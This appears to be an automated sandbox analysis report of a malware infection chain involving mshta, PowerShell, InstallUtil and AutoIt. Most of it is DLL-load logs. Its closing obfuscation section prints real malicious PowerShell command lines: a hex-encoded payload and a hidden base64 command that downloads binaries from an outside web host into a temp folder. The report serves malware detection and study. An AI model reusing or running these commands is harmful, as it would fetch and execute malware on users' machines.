Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: wsock32.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: version.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: winmm.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: mpr.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: wininet.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: iphlpapi.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: userenv.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: uxtheme.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: wsock32.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: version.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: winmm.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: mpr.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: wininet.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: iphlpapi.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: userenv.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: uxtheme.dll
Source: C:\ehcfdbh\AutoIt3.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: sEOELQpFOB.lnk

LNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\sftp.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: updater.exe, 00000014.00000003.1667032844.0000000004E08000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675294005.0000000004FA4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666853794.0000000004F29000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846289188.0000000004C54000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1832264833.0000000004AB8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831878369.0000000004BD9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000002.1916362932.0000000004A64000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908503222.00000000048C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908305023.00000000049E9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: updater.exe, 00000014.00000003.1667032844.0000000004E08000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675294005.0000000004FA4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666853794.0000000004F29000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846289188.0000000004C54000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1832264833.0000000004AB8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831878369.0000000004BD9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000002.1916362932.0000000004A64000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908503222.00000000048C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908305023.00000000049E9000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wrdZ($UvhG){return -split ($UvhG -replace '..', '0x$& ')};$ERHgk = wrdZ('ECA586FB867E54D080F88AB849BFB94F298E9D4D174F6B1F2F81610C3540C56191E34FB7B2DF87630478E180DACA97337CF338C5F0549579E18CC1A49A1339F9691FAE2EDAAC0D6E2AB4913030D45E7F9C40731A7B0ED45F438D15D573AB5E4816A3D8CA82DAA342D630EDB6E24E85F4D05E0447A728444A18214CD35DB1FD5C4C677BF1EB6DD62A0D4B42A5F996D056A8C58BF2B2ADC007CA0004F35EEDF7DB06CC47C0E8175257375360952646DDCE12F86A389A2FB4F08F04DF71ABBD10CA19394807E45AE262B4CF2BD880666BE9808038992E086339CA69F730462BD5BA268BEA9591B45C3FDDC4B990452C3C5B083B1D8A99DB9D344BE7F259679F7994FBAA4E272654402905FEB107236FDE83FA247F6DFF5EE2DE2FBE984DE8D33A5077EC31D65DAE7AAC344DB18BADD0E59C3DC0A20AA1776387E75ED82F6F21E81D436D435FE7641490C8BB3BE615F9D76B1F8A1323001EC29CB1DC720A20647927291ABFCCFF409B1F94A878B0CDB0AFF68E11DAF8B2CCB95D3B395C11FB1D2F79673936E5F6AF545B019BFDE71CDAC1667709524F9244C6D8B3198F1F28C92F507AF233B70FD15099184E521AA3D1F4EB4613BE4CC9617FD5EE373CB05A7B164A2B6211387C494F7FC2F64FB4B0EEC11B39FFCC4E09EE10E96070192D4E0E2AD737B857A3BA8766EF8B454E4CC9BAE60331184407821C7F5A417DEBB95885CD929FAC64B5913D45E20BA92710C789EA36BC01ED629BAAEEFB8F420E9D966E4669DB7E1EE213C1001073B4FB67BB454BA80B0144D096E4FA221E9AB74FB2FDA2CBBA9C669EB50610B810047A6A75A1E41407350666C1B141836EA4FB3C9588111CE216EB2E451248C7008EA09561E08463428A981B69214151A19DD58483CB4A07DA879953AA3FDBF8EC16A79ACD16FBF54B34E405FCE7D15727908982C71DB4EC3160579745FCBC610756535558573F49618C7606881E9C8F026001D9C1C40FD2462CC1EC3DCF620D160F23D6F789F8CAA4EE9835FD65AA1D0E0278809DE0D85C1295E58C782AAFF7016B75C2FBB65FE1F73E7B038C89BAA57C32930D22EE8C71A06F4A2C738995833A10226ECDFB07ECD5F6DA31617797E009FA791AB33D9189A3A8E44428EFC9D7C6FAC3474FD38038FE910BBB036CFF902B287315F807FAAA06AED95210DDE82DAEAC0A523D871AE53C0EF75EF61B9A57F8F33A81ABD5D297C8FA835397595E7202A8E9007FFC7EDE814D001B798D89293879C641BE0707A91665E5503FECF99138AC09675DB1C070F4CF90193587A5FFC1CEE76401544370EB81704BA787C0CD04C9585C45A98FE309B624E2A8DF58992BFB2E28E05D3E083F40D7259170B815F21C934D9A6B716FB374544D200AC2F51F83FF6015BF31FAF855ACD6F94C4EDCFFE1B1B1E84CD0DCE3476BE438811875890C244AF355F5A99D60D3FE596651A7FCE949EF11B75A3E47270440D77D7293E40B99F248B7EA50AE844851B9FCECC2A42A543848822154E0BDE72E753A37ABBC37D5A523E44824FDECB7EA3DA94AE0BC489AFB57E7FF8B9D330E6B6CF749C38703F35FBB8C7524C1CC772CB6E97F52B9A303F765EEA1CF88781CF03DBAF4E05C5E83D04900C62AE76C9060D2EF02C6358A9C35D3C5CADDA4513FE8720161EE8D258C9D8738089620A44FDD02266B9393340D2A4D6DF53670CE0EAC8ADF596CBD6821F99D9AA7D32C9C1C8CDD6A112CF9684123E95FA54979737993CA2ED54A8E4E7B526955F3B82D4D1180DCF858A68E630366BAE559198412C920E3DF514DC1275386D42B0CF7D7800F9A9C56DF30AC55BB715221A65AC5F1B6C047475AF5D327C3E5F8421DC5507C9898E1CA30BC70D6ED81C7FBE88DC6473A1B361F63E277C1B83D0BA47D9D3A44BB1ED147D9E3D1391B4E0C9728E31F4600C8F8CDC7EA1BB362F215217B57B713C7F2C9B60FFBB1ABF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAYQBKAHcANwA7ACQAcwBXAGYAMgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAawBOAHIAMwA7ACQAdgBQAGIAOQA9ACIAaAB0AHQAcABzADoALwAvAGMAbgBkAGUAZgAxAC4AZwByAGUAZQBuAC0AcABhAHQAaAB3AGEAeQBzAC4AcwBoAG8AcAAvAGEAcABpAC8AdQB6AC8ANwA1ADUAMgA5ADcAMwA2ADUAMAAvAHUALgBiAGkAbgAiADsAJAB4AFEAZAA1AD0AIgBoAHQAdABwAHMAOgAvAC8AYwBuAGQAZQBmADEALgBnAHIAZQBlAG4ALQBwAGEAdABoAHcAYQB5AHMALgBzAGgAbwBwAC8AYQBwAGkALwB1AHoALwA3ADUANQAyADkANwAzADYANQAwAC8AbgBuAG4ALgBiAGkAbgAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdgBQAGIAOQAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABIAHQANgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4AFEAZAA1ACAALQBPAHUAdABGAGkAbABlACAAJABzAFcAZgAyACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AFMAdABhAHIAd